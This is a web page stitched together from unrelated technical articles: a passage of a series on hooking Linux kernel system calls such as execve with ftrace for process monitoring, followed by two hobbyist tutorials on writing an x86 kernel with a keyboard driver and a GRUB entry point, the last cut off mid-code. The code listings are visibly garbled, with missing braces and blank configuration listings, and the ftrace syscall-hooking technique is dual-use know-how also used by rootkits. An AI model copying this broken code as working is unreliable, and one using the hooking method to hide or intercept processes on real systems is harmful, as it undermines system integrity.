 *                       of the hooked function
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;
        unsigned long address;
        struct ftrace_ops ops;

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:


#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),

This is what the hooked function wrapper looks like:

 * It’s a pointer to the original system call handler execve().
 * It can be called from the wrapper. It’s extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to “asmlinkage”).
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
static asmlinkage long fh_sys_execve (const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address (struct ftrace_hook *hook)
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        *((unsigned long*) hook->original) = hook->address;
        return 0;

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

 int fh_install_hook (struct ftrace_hook *hook)
        int err;
        err = resolve_hook_address(hook);
        if (err)
                return err;
        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;
        /* ... */

The fh_ftrace_thunk () feature is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they command ftrace to save and restore the processor registers whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

 int fh_install_hook (struct ftrace_hook *hook)
        /* ... */
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);
                /* Don’t forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
                return err;
        return 0;

To turn off the hook, we repeat the same actions in reverse:

 void fh_remove_hook (struct ftrace_hook *hook)
        int err;
        err = unregister_ftrace_function(&hook->ops);
        if (err)
                pr_debug("unregister_ftrace_function() failed: %d\n", err);
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

 static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        regs->ip = (unsigned long) hook->function;

We get the address of struct ftrace_hook for our function using a macro container_of() and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;

This approach has three main advantages:

  • Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command Is in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suggest that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Linux Kernel Function Tracing hooking

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel accomplishes all low-level tasks implemented on the assembler pretty fast and hands over control to the high-level do_syscall_64 () function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve ().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, there’s no such call.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Following the FTRACE_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next executed function — which leads to passing control to a new address.
  7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and returns control to the do_syscall_64() function.
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.


Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that ’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. There are several kernel requirements needed to ensure successful ftrace Linux kernel tracing:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead costs than kprobes. However, the overhead costs are higher than for splicing manually. In fact, dynamic ftrace is a variation of splicing which executes the unneeded ftrace code and other callbacks.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead costs and can disrupt the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction) so you can basically spring over ftrace.

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:


Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:


To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:


While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support a 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but it’ll significantly boost the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

According to debugging, the system got stuck inside the hooked function. For some unknown reason, the parent_ip still pointed to the kernel instead of the function wrapper when calling the original function inside the ftrace callback. This launched an endless loop wherein ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls are expanded into no-op. This printk-macro version is used for logging at the development stage. And since these logs pose no interest at the operating stage, the system simply cuts them out of the code automatically unless you activate the DEBUG macro. After that, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        return real_sys_execve(filename, argv, envp);

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace a function call instruction with a cheaper direct jump to the function’s body. This is what this call looks like in machine code:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq </fh_sys_execve>

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax </fh_sys_execve>

The first CALL instruction is the exact same __fentry__() call that the compiler inserts at the beginning of all functions. But after that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve call (via a pointer stored in memory) performed by the CALL instruction, which is followed by fh_sys_execve() with the help of the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize(«-fno-optimize-sibling-calls»)

For further hooking experiments, you can use the full kernel module code from GitHub.


While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.

Let’s write a Kernel with keyboard and screen support

origin text

Today, we will extend that kernel to include keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific address on the x86’s I/O bus, nothing more. The read/write operations from these ports are accomplished using specific instructions built into the processor.


Reading from and Writing to ports

	mov edx, [esp + 4]
	in al, dx	

	mov   edx, [esp + 4]    
	mov   al, [esp + 4 + 4]  
	out   dx, al  

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as argument. When compiler calls your function, it pushes all its arguments onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are received through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.



Now, before we go ahead with writing any device driver; we need to understand how the processor gets to know that the device has performed an event.

The easiest solution is polling — to keep checking the status of the device forever. This, for obvious reasons is not efficient and practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by the hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A device or a chip called Programmable Interrupt Controller (PIC) is responsible for x86 being an interrupt driven architecture. It manages hardware interrupts and sends them to the appropriate system interrupt.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value stored during initialization of the PIC. It adds the input line number to this offset to form the Interrupt number. Then the processor looks up a certain data structure called the Interrupt Descriptor Table (IDT) to give the interrupt handler address corresponding to the interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;


We implement IDT as an array comprising structures IDT_entry. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Its vector offset. (ICW2)
* How the PICs wired as master/slaves. (ICW3)
* Gives additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to inputs between each other. This is setup using ICW3 and each bit represents cascading status for the corresponding IRQ. For now, we won’t use cascading and set all to zeroes.

ICW4 sets the additional enviromental parameters. We will just set the lower most bit to tell the PICs we are running in the 80×86 mode.

Tang ta dang !! PICs are now initialized.


Each PIC has an internal 8 bit register named Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable and disable the nth IRQ line by making the value of the nth bit in the IMR as 0 and 1 respectively. Reading from the data port returns value in the IMR register, and writing to it sets the register. Here in our code, after initializing the PICs; we set all bits to 1 thereby disabling all IRQ lines. We will later enable the line corresponding to keyboard interrupt. As of now, let’s disable all the interrupts !!

Now if IRQ lines are enabled, our PICs can receive signals via IRQ lines and convert them to interrupt number by adding with the offset. Now, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1. This is the input line 1 of PIC1. We have initialized PIC1 to an offset 0x20 (see ICW2). To find interrupt number, add 1 + 0x20 ie. 0x21. So, keyboard handler address has to be mapped against interrupt 0x21 in the IDT.

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consist of 64 bits. In the IDT entry for the interrupt, we do not store the entire address of the handler function together. We split it into 2 parts of 16 bits. The lower bits are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the type — that this is done to trap an interrupt. We also need to give the kernel code segment offset. GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment; so its offset is 0x08 (More on this would be too much for this article). Interrupt gate is represented by 0x8e. The remaining 8 bits in the middle has to be filled with all zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.

Once the required mappings are done in the IDT, we got to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt take one operand. The operand must be a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straight forward. It contains the size of IDT in bytes and its address. I have used an array to pack the values. You may also populate it using a struct.

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

	mov edx, [esp + 4]
	lidt [edx]

Additionally, load_idt() function turns the interrupts on using sti instruction.

Once the IDT is set up and loaded, we can turn on keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);


Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via IDT entry for interrupt 0x21.
So, everytime you press a key on your keyboard you can be sure this function is called.

	call    keyboard_handler_main

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, however it’s much easier to write code in C than in assembly — so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to a program that was interrupted by an interrupt. These class of instructions pop the flags register that was pushed into the stack when the interrupt call was made.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		if(keycode < 0)
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	

We first signal EOI (End Of Interrput acknowlegment) by writing it to the PIC’s command port. Only after this; will the PIC allow further interrupt requests. We have to read 2 ports here — the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, it means the buffer is empty and there is no data to read. In other cases, we can read the data port 0x60. This port will give us a keycode of the key pressed. Each keycode corresponds to each key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed on to the screen using the same technique we used in the previous article.

In this article for the sake of brevity, I am only handling lowercase a-z and digits 0-9. You can with ease extend this to include special characters, ALT, SHIFT, CAPS LOCK. You can get to know if the key was pressed or released from the status port output and perform desired action. You can also map any combination of keys to special functions such as shutdown etc.

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support


References and Thanks

  1. 1.
  2. 2.



Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address for the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is in fact, the last 16 bytes of the 32-bit address space. This memory address is called reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution.  BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. (whether bytes 511 and 512 of first sector are 0xAA55)

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.


What all do we need?

* An x86 computer (of course)
* Linux
NASM assembler
* gcc
* ld (GNU Linker)
* grub


Source Code

Source code is available at my Github repository — mkernel


The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not mandatorily required in our example, however is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can awake the CPU from an hltinstruction. So we disable interrupts beforehand using cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.


The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

*  kernel.c
void kmain(void)
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loops clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
